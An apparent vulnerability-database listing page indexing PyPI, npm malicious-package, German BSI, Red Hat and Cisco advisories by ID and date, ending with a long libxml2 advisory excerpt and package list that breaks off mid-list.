pysec-2017-109 Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Reflected XS... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.536257Z
pysec-2017-108 Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to DOM XSS in t... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.465498Z
pysec-2017-107 Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Stored Cross... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.413874Z
pysec-2017-106 Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating use cookies that could be accessible ... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.361409Z
pysec-2017-105 Apache Atlas versions 0.6.0 (incubating), 0.7.0 (incubating), and 0.7.1 (incubating) allow access... 2017-08-29T20:29:00Z 2023-12-01T23:23:55.302348Z
pysec-2023-247 aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Affected versions... 2023-11-14T21:15:00+00:00 2023-11-22T23:23:57.631856+00:00
pysec-2023-246 aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. The HTTP parser i... 2023-11-14T21:15:00+00:00 2023-11-22T23:23:57.547793+00:00
pysec-2023-245 PyPinkSign v0.5.1 uses a non-random or static IV for Cipher Block Chaining (CBC) mode in AES encr... 2023-11-16T18:15:00+00:00 2023-11-22T19:19:42.405614+00:00
pysec-2023-244 Apache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs i... 2023-11-22T10:15:00+00:00 2023-11-22T11:21:52.095543+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33463 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33462 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33461 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33460 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33459 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33458 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33457 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33456 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33455 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33454 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33453 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33452 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33451 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33450 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33449 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33448 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33447 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33446 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33445 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33444 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33443 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33442 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33441 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33440 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33439 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33438 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33437 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33436 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33435 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33434 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
mal-2024-8256 Malicious code in @diotoborg/doloribus-provident (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:12Z
mal-2024-8248 Malicious code in @diotoborg/dolores-esse-incidunt (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:12Z
mal-2024-8247 Malicious code in @diotoborg/dolores-dolore (npm) 2024-09-02T01:42:08Z 2024-09-02T01:42:12Z
mal-2024-8242 Malicious code in @diotoborg/dolore-sint-deserunt (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:12Z
mal-2024-8226 Malicious code in @diotoborg/dignissimos-officiis (npm) 2024-09-02T01:42:07Z 2024-09-02T01:42:12Z
mal-2024-8214 Malicious code in @diotoborg/delectus-necessitatibus-voluptatum (npm) 2024-09-02T01:42:08Z 2024-09-02T01:42:12Z
mal-2024-8192 Malicious code in @diotoborg/corporis-repellat-dicta (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:12Z
mal-2024-8158 Malicious code in @diotoborg/atque-mollitia-consequuntur (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:12Z
mal-2024-8128 Malicious code in @diotoborg/aliquid-non (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:12Z
mal-2024-8126 Malicious code in @diotoborg/aliquam-ut (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:12Z
mal-2024-8123 Malicious code in @diotoborg/aliquam-perferendis-repudiandae (npm) 2024-09-02T01:42:08Z 2024-09-02T01:42:12Z
mal-2024-8102 Malicious code in @diotoborg/accusamus-itaque-adipisci (npm) 2024-09-02T01:42:08Z 2024-09-02T01:42:12Z
mal-2024-8706 Malicious code in @diotoborg/voluptatum-voluptas-enim (npm) 2024-09-02T01:42:09Z 2024-09-02T01:42:11Z
mal-2024-8680 Malicious code in @diotoborg/veritatis-nihil-vero (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8673 Malicious code in @diotoborg/velit-nulla (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8668 Malicious code in @diotoborg/ut-maxime (npm) 2024-09-02T01:42:09Z 2024-09-02T01:42:11Z
mal-2024-8665 Malicious code in @diotoborg/ullam-dignissimos-repudiandae (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8650 Malicious code in @diotoborg/tempore-ad-veritatis (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8624 Malicious code in @diotoborg/sed-minus-itaque (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8623 Malicious code in @diotoborg/sed-doloremque (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8572 Malicious code in @diotoborg/quis-tempore-distinctio (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8560 Malicious code in @diotoborg/quia-voluptatum (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8553 Malicious code in @diotoborg/qui-nisi-ullam (npm) 2024-09-02T01:42:09Z 2024-09-02T01:42:11Z
mal-2024-8548 Malicious code in @diotoborg/quas-veritatis (npm) 2024-09-02T01:42:07Z 2024-09-02T01:42:11Z
mal-2024-8503 Malicious code in @diotoborg/officiis-nam-dignissimos (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8485 Malicious code in @diotoborg/numquam-veritatis-error (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8484 Malicious code in @diotoborg/numquam-illum (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8477 Malicious code in @diotoborg/non-voluptatum (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
mal-2024-8463 Malicious code in @diotoborg/nihil-laboriosam (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:11Z
mal-2024-8460 Malicious code in @diotoborg/nesciunt-ullam (npm) 2024-09-02T01:42:10Z 2024-09-02T01:42:11Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
wid-sec-w-2024-1966 Samsung Exynos: Mehrere Schwachstellen ermöglichen Denial of Service 2024-09-01T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1965 MISP: Schwachstelle ermöglicht Offenlegung von Informationen 2024-09-01T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1964 Dell PowerScale: Mehrere Schwachstellen 2024-09-01T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1963 Checkmk: Schwachstelle ermöglicht Offenlegung von Informationen 2024-09-01T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1962 M-Files Server: Schwachstelle ermöglicht Offenlegung von Informationen 2024-09-01T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1961 Hashicorp Vault: Schwachstelle ermöglicht Offenlegung von Informationen 2024-09-01T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1960 libpng: Schwachstelle ermöglicht Offenlegung von Informationen 2015-10-26T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1959 libpng: Schwachstelle ermöglicht Denial of Service 2015-11-12T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1932 D-LINK Router DIR-846W: Mehrere Schwachstellen ermöglichen Codeausführung 2024-08-27T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1510 Red Hat Enterprise Linux (iperf3): Mehrere Schwachstellen 2024-07-02T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-0801 Apache HTTP Server: Mehrere Schwachstellen ermöglichen Manipulation von Daten 2024-04-04T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-0687 Python: Mehrere Schwachstellen ermöglichen Codeausführung und DoS 2024-03-20T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-0335 PostgreSQL: Schwachstelle ermöglicht Privilegieneskalation 2024-02-08T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2023-3060 cURL: Mehrere Schwachstellen 2023-12-05T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2023-2116 Ruby on Rails: Schwachstelle ermöglicht Offenlegung von Informationen 2023-08-22T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2023-1203 PostgreSQL: Mehrere Schwachstellen 2023-05-11T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2023-0428 Verschiedene TLS-Implementierungen: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2016-01-06T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2023-0175 libpng: Schwachstelle ermöglicht Denial of Service 2015-12-13T23:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2022-1862 cURL: Mehrere Schwachstellen 2022-10-25T22:00:00.000+00:00 2024-09-01T22:00:00.000+00:00
wid-sec-w-2024-1958 Linux Kernel: Schwachstelle ermöglicht DoS 2024-08-29T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1957 Mattermost Server: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-08-29T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1956 Linux Kernel: Schwachstelle ermöglicht Offenlegung von Informationen 2024-08-29T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1954 Rockwell Automation FactoryTalk: Schwachstelle ermöglicht Privilegieneskalation und Codeausführung 2024-08-29T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1953 PHP: Mehrere Schwachstellen ermöglichen Denial of Service 2024-08-29T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1952 ESRI Portal for ArcGIS: Mehrere Schwachstellen 2024-08-29T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1946 Google Chrome: Mehrere Schwachstellen ermöglichen Codeausführung 2024-08-28T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1944 Red Hat multicluster engine for Kubernetes: Schwachstelle ermöglicht Denial of Service 2024-08-28T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1929 Apache Portable Runtime (APR): Schwachstelle ermöglicht Offenlegung von Informationen 2024-08-26T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-1525 Ghostscript: Mehrere Schwachstellen 2024-07-03T22:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
wid-sec-w-2024-0630 Apache Tomcat: Mehrere Schwachstellen ermöglichen Denial of Service 2024-03-13T23:00:00.000+00:00 2024-08-29T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
rhsa-2022_6422 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.0.2 security and bug fixes 2022-09-12T21:10:32+00:00 2025-03-24T12:01:09+00:00
rhsa-2022_8652 Red Hat Security Advisory: Red Hat Fuse 7.11.1 release and security update 2022-11-28T14:39:27+00:00 2025-03-24T12:01:08+00:00
rhsa-2022_6271 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.3.12 security updates and bug fixes 2022-08-31T14:25:25+00:00 2025-03-24T12:01:06+00:00
rhsa-2023_0264 Red Hat Security Advisory: Red Hat OpenShift (Logging Subsystem) security update 2023-01-19T11:03:41+00:00 2025-03-24T12:01:00+00:00
rhsa-2022_6272 Red Hat Security Advisory: Red Hat OpenShift Service Mesh 2.0.11 security update 2022-08-31T15:00:53+00:00 2025-03-24T12:00:59+00:00
rhsa-2022_6392 Red Hat Security Advisory: RHV RHEL Host (ovirt-host) [ovirt-4.5.2] security update 2022-09-08T11:29:21+00:00 2025-03-24T12:00:54+00:00
rhsa-2022_6156 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.11.0 security, enhancement, & bugfix update 2022-08-24T13:45:52+00:00 2025-03-24T12:00:50+00:00
rhsa-2022_7276 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.4.8 security fixes and container updates 2022-11-01T19:46:29+00:00 2025-03-24T12:00:46+00:00
rhsa-2022_5913 Red Hat Security Advisory: Red Hat Kiali for OpenShift Service Mesh 2.0 security update 2022-08-08T08:09:05+00:00 2025-03-24T12:00:42+00:00
rhsa-2022_5498 Red Hat Security Advisory: Satellite 6.11 Release 2022-07-05T14:41:16+00:00 2025-03-24T12:00:39+00:00
rhsa-2022_6345 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.1 security updates and bug fixes 2022-09-06T14:28:04+00:00 2025-03-24T12:00:36+00:00
rhsa-2022_5915 Red Hat Security Advisory: Red Hat Kiali for OpenShift Service Mesh 2.2 security update 2022-08-08T08:47:11+00:00 2025-03-24T12:00:34+00:00
rhsa-2022_5115 Red Hat Security Advisory: Red Hat OpenStack Platform 16.2 (python-django20) security update 2022-06-22T16:04:43+00:00 2025-03-24T12:00:32+00:00
rhsa-2022_5914 Red Hat Security Advisory: Red Hat Kiali for OpenShift Service Mesh 2.1 security update 2022-08-08T08:16:49+00:00 2025-03-24T12:00:27+00:00
rhsa-2022_5702 Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.1.2 security and bug fix update 2022-07-25T18:33:26+00:00 2025-03-24T12:00:18+00:00
rhsa-2022_5703 Red Hat Security Advisory: Red Hat Ansible Automation Platform 1.2 security update 2022-07-25T19:53:29+00:00 2025-03-24T12:00:11+00:00
rhba-2024_1440 Red Hat Bug Fix Advisory: MTV 2.5.6 Images 2024-03-20T11:13:11+00:00 2025-03-24T12:00:09+00:00
rhea-2024_11005 Red Hat Enhancement Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.15.0 2024-12-12T14:32:14+00:00 2025-03-24T12:00:00+00:00
rhsa-2022_5602 Red Hat Security Advisory: RHUI 4.1.1 release - Security Fixes and Enhancement Update 2022-07-19T13:06:09+00:00 2025-03-24T11:59:57+00:00
rhba-2024_1136 Red Hat Bug Fix Advisory: podman bug fix update 2024-03-05T20:05:51+00:00 2025-03-24T11:59:57+00:00
rhea-2024_6787 Red Hat Enhancement Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.14.0 2024-09-18T18:30:16+00:00 2025-03-24T11:59:48+00:00
rhba-2024_1127 Red Hat Bug Fix Advisory: libssh bug fix update 2024-03-05T18:22:05+00:00 2025-03-24T11:59:45+00:00
rhba-2024_0928 Red Hat Bug Fix Advisory: MTV 2.5.5 Images 2024-02-20T15:58:35+00:00 2025-03-24T11:59:34+00:00
rhba-2024_3593 Red Hat Bug Fix Advisory: Red Hat Advanced Cluster Management 2.9.4 bug fixes and container updates 2024-06-04T14:47:10+00:00 2025-03-24T11:59:23+00:00
rhba-2024_3555 Red Hat Bug Fix Advisory: multicluster engine for Kubernetes 2.4.5 bug fixes and container updates 2024-06-03T19:43:56+00:00 2025-03-24T11:59:09+00:00
rhsa-2024_10843 Red Hat Security Advisory: python-tornado security update 2024-12-05T11:25:56+00:00 2025-03-24T10:56:25+00:00
rhsa-2025_3108 Red Hat Security Advisory: pcs security update 2025-03-24T10:39:40+00:00 2025-03-24T10:56:20+00:00
rhsa-2024_10836 Red Hat Security Advisory: python-tornado security update 2024-12-05T10:19:31+00:00 2025-03-24T10:56:12+00:00
rhsa-2025_3109 Red Hat Security Advisory: pcs security update 2025-03-24T10:39:04+00:00 2025-03-24T10:56:08+00:00
rhsa-2024_10590 Red Hat Security Advisory: python-tornado security update 2024-12-02T01:31:22+00:00 2025-03-24T10:55:59+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
cisco-sa-ise-file-download-b3br5kqa Cisco Identity Services Engine File Download Vulnerability 2021-10-20T16:00:00+00:00 2021-10-20T16:00:00+00:00
cisco-sa-imc-gui-dos-tzjrfyzh Cisco Integrated Management Controller GUI Denial of Service Vulnerability 2021-10-20T16:00:00+00:00 2021-10-20T16:00:00+00:00
cisco-sa-cvdsd-xss-fvdj6hk Cisco Vision Dynamic Signage Director Reflected Cross-Site Scripting Vulnerability 2021-10-06T16:00:00+00:00 2021-10-15T21:45:49+00:00
cisco-sa-tpce-rmos-mem-dos-rck56tt Cisco TelePresence Collaboration Endpoint and RoomOS Software Denial of Service Vulnerability 2021-10-06T16:00:00+00:00 2021-10-15T21:03:56+00:00
cisco-sa-ipphone-arbfileread-npdte2ow Cisco IP Phone Software Arbitrary File Read Vulnerability 2021-10-06T16:00:00+00:00 2021-10-14T13:57:39+00:00
cisco-sa-ise-priv-esc-uwqprbm3 Cisco Identity Services Engine Privilege Escalation Vulnerability 2021-10-06T16:00:00+00:00 2021-10-11T16:18:56+00:00
cisco-sa-ipsla-za3srrpp Cisco IOS XR Software IP Service Level Agreements and Two-Way Active Measurement Protocol Denial of Service Vulnerability 2021-09-08T16:00:00+00:00 2021-10-08T12:49:15+00:00
cisco-sa-npspin-qypwdhfd Cisco IOS XR Software for ASR 9000 Series Routers Denial of Service Vulnerability 2021-09-08T16:00:00+00:00 2021-10-08T12:18:21+00:00
cisco-sa-apache-httpd-pathtrv-lazg68cz Apache HTTP Server Vulnerabilities: October 2021 2021-10-07T16:00:00+00:00 2021-10-07T16:00:00+00:00
cisco-sa-ucsi2-command-inject-cgyc8y2r Cisco Intersight Virtual Appliance Command Injection Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-ssm-priv-esc-5g35cddj Cisco Smart Software Manager Privilege Escalation Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-sb-hardcoded-cred-mjcexvx Cisco Business 220 Series Smart Switches Static Key and Password Vulnerabilities 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-ise-xxe-inj-v4vsjesx Cisco Identity Services Engine XML External Entity Injection Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-ise-info-disc-pnxtlhdp Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-esa-url-bypass-sgcfsdrp Cisco Email Security Appliance URL Filtering Bypass Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-dnac-infodisc-kyc6yncs Cisco DNA Center Information Disclosure Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-anyconnect-lib-hija-cafb7x4q Cisco AnyConnect Secure Mobility Client for Linux and Mac OS with VPN Posture (HostScan) Module Shared Library Hijacking Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-amp-redirect-rq2bu7du Cisco Orbital Open Redirect Vulnerability 2021-10-06T16:00:00+00:00 2021-10-06T16:00:00+00:00
cisco-sa-lasso-saml-jun2021-doxnrlkd Lasso SAML Implementation Vulnerability Affecting Cisco Products: June 2021 2021-06-01T12:30:00+00:00 2021-09-30T14:51:31+00:00
cisco-sa-ewlc-ipv6-dos-nmyecnzv Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers IPv6 Denial of Service Vulnerability 2021-09-22T16:00:00+00:00 2021-09-28T15:57:04+00:00
cisco-sa-sni-data-exfil-mfgzxqln Multiple Cisco Products Server Name Identification Data Exfiltration Vulnerability 2021-08-18T16:00:00+00:00 2021-09-27T16:31:35+00:00
cisco-sa-sdwan-buffover-mwgucjto Cisco SD-WAN vEdge Software Buffer Overflow Vulnerabilities 2021-05-05T16:00:00+00:00 2021-09-24T21:36:50+00:00
cisco-sa-zbfw-tguguyq Cisco IOS XE Software Protection Against Distributed Denial of Service Attacks Feature Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-zbfw-pp9jfzwl Cisco IOS XE Software Zone-Based Policy Firewall ICMP and UDP Inspection Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-trustsec-dos-7fuxdr2 Cisco IOS and IOS XE Software TrustSec CLI Parser Denial of Service Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-sdwan-maapi-privesc-ksug7qss Cisco IOS XE SD-WAN Software Command Injection Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-sdwan-maapi-cmdinjec-znuytuc Cisco SD-WAN Software Command Injection Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-sd-wan-josurjcc Cisco SD-WAN vManage Software Cypher Query Language Injection Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-sd-wan-gjr5pgom Cisco IOS XE SD-WAN Software Arbitrary File Overwrite Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
cisco-sa-sd-wan-credentials-ydyfskzz Cisco SD-WAN vManage Software Disaster Recovery Feature Password Exposure Vulnerability 2021-09-22T16:00:00+00:00 2021-09-22T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-201605-0465 The xmlPArserPrintFileContextInternal function in libxml2 before 2.9.4, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted XML document. Apple Mac OS X, watchOS, iOS, and tvOS are prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary code and bypass security restrictions. Failed exploit attempts may result in a denial-of-service condition. Versions prior to iOS 9.3.2, watchOS 2.2.1, Mac OS X 10.11.5, and tvOS 9.2.1 are vulnerable. in the United States. Apple iOS is an operating system developed for mobile devices; watchOS is a smart watch operating system; OS X El Capitan is a dedicated operating system developed for Mac computers; tvOS is a smart TV operating system. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. CVE-ID CVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks Installation note: Instructions on how to update your Apple Watch software are available at https://support.apple.com/en-us/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: libxml2 security update Advisory ID: RHSA-2016:1292-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2016:1292 Issue date: 2016-06-23 CVE Names: CVE-2016-1762 CVE-2016-1833 CVE-2016-1834 CVE-2016-1835 CVE-2016-1836 CVE-2016-1837 CVE-2016-1838 CVE-2016-1839 CVE-2016-1840 CVE-2016-3627 CVE-2016-3705 CVE-2016-4447 CVE-2016-4448 CVE-2016-4449 ===================================================================== 1. Summary: An update for libxml2 is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 3. Description: The libxml2 library is a development toolbox providing the implementation of various XML standards. A remote attacker could provide a specially crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or execute arbitrary code with the permissions of the user running the application. (CVE-2016-1834, CVE-2016-1840) Multiple denial of service flaws were found in libxml2. A remote attacker could provide a specially crafted XML file that, when processed by an application using libxml2, could cause that application to crash. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 For the update to take effect, all applications linked to the libxml2 library must be restarted, or the system rebooted. 5. Package List: Red Hat Enterprise Linux HPC Node (v. 6): Source: libxml2-2.7.6-21.el6_8.1.src.rpm x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: libxml2-2.7.6-21.el6_8.1.src.rpm i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm ppc64: libxml2-2.7.6-21.el6_8.1.ppc.rpm libxml2-2.7.6-21.el6_8.1.ppc64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc.rpm libxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm libxml2-python-2.7.6-21.el6_8.1.ppc64.rpm s390x: libxml2-2.7.6-21.el6_8.1.s390.rpm libxml2-2.7.6-21.el6_8.1.s390x.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-devel-2.7.6-21.el6_8.1.s390.rpm libxml2-devel-2.7.6-21.el6_8.1.s390x.rpm libxml2-python-2.7.6-21.el6_8.1.s390x.rpm x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm ppc64: libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-static-2.7.6-21.el6_8.1.ppc64.rpm s390x: libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-static-2.7.6-21.el6_8.1.s390x.rpm x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: libxml2-2.7.6-21.el6_8.1.src.rpm i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm 